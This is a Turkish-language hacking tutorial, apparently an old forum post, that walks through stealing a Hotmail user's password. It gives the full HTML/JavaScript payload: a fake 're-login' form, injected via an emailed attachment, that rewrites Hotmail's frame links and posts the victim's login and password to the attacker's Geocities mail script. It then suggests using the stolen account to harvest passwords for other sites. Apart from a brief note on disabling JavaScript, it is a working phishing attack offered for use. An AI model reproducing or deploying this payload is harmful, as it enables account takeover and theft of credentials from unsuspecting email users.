HOTMAIL HACK 2010 yılı
HOTMAIL HACK
Microsoft’un ünlü ücretsiz e-mail sitesi hack edildi. Nasil mi oluyor?
Kurbana Javascript codu iceren bir e-mail attiyorsunuz.Kurban bu e-mail’i görüntüledigi zaman
Javascript kodu devreye giriyor ve Kurbana tekrar Login olmasini söylüyor.Tabii böyle olunca
size kurbanin kullanici adi ve ip adresini iceren bir e-mail geliyor.
Tabii siz kullanici adini ve sifresini ögrendiginiz zaman hesabin tam kullanin hakkini
kazaniyorsunuz.silmek, okumak, kurban adina mailler göndermek… Tabii siz bos durmayip POP
Mail’leride kontrol ediyorsunuz ve kurbanin diger sitelerdeki hesaplarinin sifrelerini
aliyorsunuz.
Peki bu olaydan kurtulamayacagiz mi ??? .
Netscape kullanicilari javascript ayarlarini söyle kapatabilir.
(edit / preferences / advanced / disablejavascript).
Microsoft Internet Explorer kullanicilari jscript ayarlarini su sekilde kapatabiliir.
(view / internet options /security / custom settings / scripting / disable active scripting).
Tabii En Önemlisi Baskasinin Hotmail Hesabini Nasil Ele Geciririz ???
Asagidaki Listedekiler elimizde olmali.
1 Internete bagli bir bilgisayar… eh yani :-))
1 Netscape Mail (veya herhangi bir e-mail programi)
1 Notepad (veya herhangi bir text editor)
1.ADIM:
hotmail.com sitesini ziyaret ediyoruz ve ücretsiz bir e-mail hesabi actiriyoruz. Formu
doldururken gercek bilgilerimizi vermemize gerek yok. Rastgele birseyler yazsakta olur.
2.ADIM:
Geocities.com sitesini ziyaret ediyoruz ve ücretsiz bir e-mail hesabi actiriyoruz. Formu
doldururken gercek bilgilerimizi vermemize gerek yok. Rastgele birseyler yazsakta olur.1.adimda
e-mail adresini kullandik.ve geocities’ten bir e-mail adresi aldik.örnegin(ybwc@geocities.com).
3.ADIM:
NotePad’imizi aciyoruz ve asagidaki text’i yaziyoruz. Daha sonra message.htm ismini verip kayit
ediyoruz. Satir 17’de Geocities kullanici adimiz yaziyor. (ybwc) 2.adimda belirttigimiz gibi.
(bu kullanici adini kendinize göre degistirin.)
<html><head></head><body>
<p>”Go where you want today” – Blue Adept</p>
<script>
function getmess(){
return “<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>” +
“<tr valign=middle>” +
“<th colspan=2>” +
“<font face=\”Arial, Helvetica\” size=\”5\”>” +
“We’re Sorry, We Cannot<br>Process Your Request” +
“</font></th></tr>” +
“<tr valign=middle><td align=center>” +
“<font face=\”Arial, Helvetica\” size=\”3\”>Reason: </font>” +
“<font face=\”Arial, Helvetica\” size=\”3\” color=\”#ff0000\”><b>Time expired. Please re-login.</b></font><br>” +
“<font face=\”Arial, Helvetica\” size=\”2\”><a href=\”http://www.hotmail.com/errormsg.html\”>(Get more info regarding error messages here)</a></font>” +
“</td></tr>” +
“<tr valign=\”middle\”><td align=\”center\”>” +
“<FORM METHOD=POST ACTION=\”http://www.geocities.com/cgi-bin/homestead/mail.pl?kabakkemanehehehe\” target=\”_top\”>” +
“<INPUT TYPE=\”hidden\” NAME=\”next-url\” VALUE=\”http://www.hotmail.com\”>” +
“<INPUT TYPE=\”hidden\” NAME=\”subject\” VALUE=\”Hotmail Password\”>” +
“<table cellpadding=\”0\” cellspacing=\”5\” border=\”0\”>” +
“<tr><td><font face=\”Arial, Helvetica\” size=\”2\”>Login Name:</font><br><input type=\”text\” name=\”login\” size=\”16\” maxlength=\”16\”></td><td><font face=\”Arial, Helvetica\” size=\”2\”>Password:</font><br><input type=\”password\” name=\”passwd\” size=\”16\” maxlength=\”16\”> <input type=\”submit\” value=\”Enter\”></td><tr>” +
“</table></form></td></tr>” +
“<tr valign=middle><th colspan=2 align=center>” +
“<font face=\”Arial, Helvetica\” size=\”3\”>” +
“Return to <a href=\”http://welcome.to/www.hotmail.com\” target=\”_parent\”>Hotmail’s Homepage</a>.” +
“</font></th></tr></table>” +
“<p><img src=\”http://209.1.112.251/c9698.gif\” width=189 height=16 border=0 alt=\”Copyright 1996-1997\”>”;
}
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links[i].target=”work”;
top.submenu.document.links[i].href=”javascript:getmess()”;
}
noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links[i].target=”work”;
top.work.document.links[i].href=”javascript:getmess()”;
}
</script>
</body>
</html>
4.ADIM
kurbanizima yeni bir e-mail mesaji hazirlayip gönderiyoruz.örnegin: kurban,
(victim@hotmail.com)olsun. E-mailimize message.htm dosyasinida ekliyoruz ve gönderiyoruz.
5.ADIM
Kurbanimizin e-mailini kontrol etmesini bekliyoruz. Kurban bizim e-maili görüntüledigi zaman
Geocities’teki mailimizi kontrol ediyoruz. Geocities2ten bir mail aliyoruz. Tabii bu mail’de
kurbanimizin kullanici adi, sifresi ve ip adresi oluyor…
Bu Bilgiler Çeşitli Yerlerden Elde Edilip LaCCeS Tarafından Düzeltilmiş ve Ek Bilgiler Eklenmiştir…